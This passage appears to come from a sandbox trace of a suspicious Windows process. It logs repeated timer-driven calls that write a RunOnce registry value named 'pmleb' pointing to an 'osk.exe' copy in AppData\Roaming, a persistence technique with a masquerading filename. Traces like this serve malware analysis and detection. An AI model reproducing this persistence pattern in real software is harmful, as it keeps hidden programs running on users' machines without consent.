uIDEvent=0x2424) returned 1 [0108.379] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.380] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.380] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.380] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.380] RegCloseKey (hKey=0x280) returned 0x0 [0108.380] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.380] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.380] SetTimer (hWnd=0x20280, nIDEvent=0x2425, uElapse=0xa, lpTimerFunc=0x0) returned 0x2425 [0108.380] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.438] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.438] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.438] KillTimer (hWnd=0x20280, uIDEvent=0x2425) returned 1 [0108.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.439] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.439] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.439] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.439] RegCloseKey (hKey=0x280) returned 0x0 [0108.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.440] SetTimer (hWnd=0x20280, nIDEvent=0x2426, uElapse=0xa, lpTimerFunc=0x0) returned 0x2426 [0108.440] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.443] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.443] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.443] KillTimer (hWnd=0x20280, uIDEvent=0x2426) returned 1 [0108.443] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.444] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.444] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.444] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.444] RegCloseKey (hKey=0x280) returned 0x0 [0108.444] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.444] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.445] SetTimer (hWnd=0x20280, nIDEvent=0x2427, uElapse=0xa, lpTimerFunc=0x0) returned 0x2427 [0108.445] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.458] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.458] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.458] KillTimer (hWnd=0x20280, uIDEvent=0x2427) returned 1 [0108.458] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0108.459] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.459] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.459] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.459] RegCloseKey (hKey=0x280) returned 0x0 [0108.459] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.460] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.460] SetTimer (hWnd=0x20280, nIDEvent=0x2428, uElapse=0xa, lpTimerFunc=0x0) returned 0x2428 [0108.460] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.473] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.473] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.474] KillTimer (hWnd=0x20280, uIDEvent=0x2428) returned 1 [0108.474] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.474] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.474] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.475] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.475] RegCloseKey (hKey=0x280) returned 0x0 
[0108.475] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.475] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.475] SetTimer (hWnd=0x20280, nIDEvent=0x2429, uElapse=0xa, lpTimerFunc=0x0) returned 0x2429 [0108.475] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.489] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.489] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.489] KillTimer (hWnd=0x20280, uIDEvent=0x2429) returned 1 [0108.489] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.490] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.490] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.490] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.490] RegCloseKey (hKey=0x280) returned 0x0 [0108.490] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.490] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.490] SetTimer (hWnd=0x20280, nIDEvent=0x242a, uElapse=0xa, lpTimerFunc=0x0) returned 0x242a [0108.491] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.505] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.505] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.505] KillTimer (hWnd=0x20280, uIDEvent=0x242a) returned 1 [0108.505] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.506] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.506] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.506] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.506] RegCloseKey (hKey=0x280) returned 0x0 [0108.506] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.506] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.507] SetTimer (hWnd=0x20280, nIDEvent=0x242b, uElapse=0xa, lpTimerFunc=0x0) returned 0x242b [0108.507] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.520] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.520] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.520] KillTimer (hWnd=0x20280, uIDEvent=0x242b) returned 1 [0108.521] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.521] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.521] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.521] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.521] RegCloseKey (hKey=0x280) returned 0x0 [0108.522] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.522] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.522] SetTimer (hWnd=0x20280, nIDEvent=0x242c, uElapse=0xa, lpTimerFunc=0x0) returned 0x242c [0108.522] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.536] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.536] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.536] KillTimer (hWnd=0x20280, uIDEvent=0x242c) returned 1 [0108.536] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.536] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.537] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.537] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.537] RegCloseKey (hKey=0x280) returned 0x0 [0108.537] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.537] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.537] SetTimer (hWnd=0x20280, nIDEvent=0x242d, uElapse=0xa, lpTimerFunc=0x0) returned 0x242d [0108.537] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.551] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.551] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.551] KillTimer (hWnd=0x20280, uIDEvent=0x242d) returned 1 [0108.552] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.552] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.552] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.552] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.553] RegCloseKey (hKey=0x280) returned 0x0 [0108.553] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.553] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.553] SetTimer (hWnd=0x20280, nIDEvent=0x242e, uElapse=0xa, lpTimerFunc=0x0) returned 0x242e [0108.553] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.567] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.567] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.567] KillTimer (hWnd=0x20280, uIDEvent=0x242e) returned 1 [0108.567] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.568] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.568] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.568] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.568] RegCloseKey (hKey=0x280) returned 0x0 [0108.568] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.568] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0108.568] SetTimer (hWnd=0x20280, nIDEvent=0x242f, uElapse=0xa, lpTimerFunc=0x0) returned 0x242f [0108.569] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.583] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.583] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.583] KillTimer (hWnd=0x20280, uIDEvent=0x242f) returned 1 [0108.583] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.583] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.584] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.584] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.584] RegCloseKey (hKey=0x280) returned 0x0 [0108.584] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.584] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.584] SetTimer (hWnd=0x20280, nIDEvent=0x2430, uElapse=0xa, lpTimerFunc=0x0) returned 0x2430 [0108.584] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.617] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.617] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.617] KillTimer (hWnd=0x20280, uIDEvent=0x2430) returned 1 [0108.617] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.617] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.618] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.618] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.618] RegCloseKey (hKey=0x280) returned 0x0 [0108.618] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.618] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.618] SetTimer (hWnd=0x20280, nIDEvent=0x2431, uElapse=0xa, lpTimerFunc=0x0) returned 0x2431 [0108.618] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.629] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.629] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.629] KillTimer (hWnd=0x20280, uIDEvent=0x2431) returned 1 [0108.630] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.630] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.630] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.630] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.630] RegCloseKey (hKey=0x280) returned 0x0 [0108.631] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.631] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.631] SetTimer (hWnd=0x20280, nIDEvent=0x2432, uElapse=0xa, lpTimerFunc=0x0) returned 0x2432 
[0108.631] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.645] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.645] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.645] KillTimer (hWnd=0x20280, uIDEvent=0x2432) returned 1 [0108.645] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.645] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.645] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.646] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.646] RegCloseKey (hKey=0x280) returned 0x0 [0108.646] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.646] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.646] SetTimer (hWnd=0x20280, nIDEvent=0x2433, uElapse=0xa, lpTimerFunc=0x0) returned 0x2433 [0108.646] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.660] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.660] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.660] KillTimer (hWnd=0x20280, uIDEvent=0x2433) returned 1 [0108.661] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.661] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.661] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.661] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.661] RegCloseKey (hKey=0x280) returned 0x0 [0108.661] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.661] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.661] SetTimer (hWnd=0x20280, nIDEvent=0x2434, uElapse=0xa, lpTimerFunc=0x0) returned 0x2434 [0108.662] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.677] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.677] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.677] KillTimer (hWnd=0x20280, uIDEvent=0x2434) returned 1 [0108.677] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.677] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.677] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.678] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.678] RegCloseKey (hKey=0x280) returned 0x0 [0108.678] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.678] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.678] SetTimer (hWnd=0x20280, nIDEvent=0x2435, uElapse=0xa, lpTimerFunc=0x0) returned 0x2435 [0108.678] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0108.692] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.692] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.692] KillTimer (hWnd=0x20280, uIDEvent=0x2435) returned 1 [0108.692] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.692] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.693] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.693] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.693] RegCloseKey (hKey=0x280) returned 0x0 [0108.693] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.693] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.693] SetTimer (hWnd=0x20280, nIDEvent=0x2436, uElapse=0xa, lpTimerFunc=0x0) returned 0x2436 [0108.693] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.707] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.707] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.707] KillTimer (hWnd=0x20280, uIDEvent=0x2436) returned 1 [0108.707] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.708] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.708] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.708] RegSetValueExA (in: 
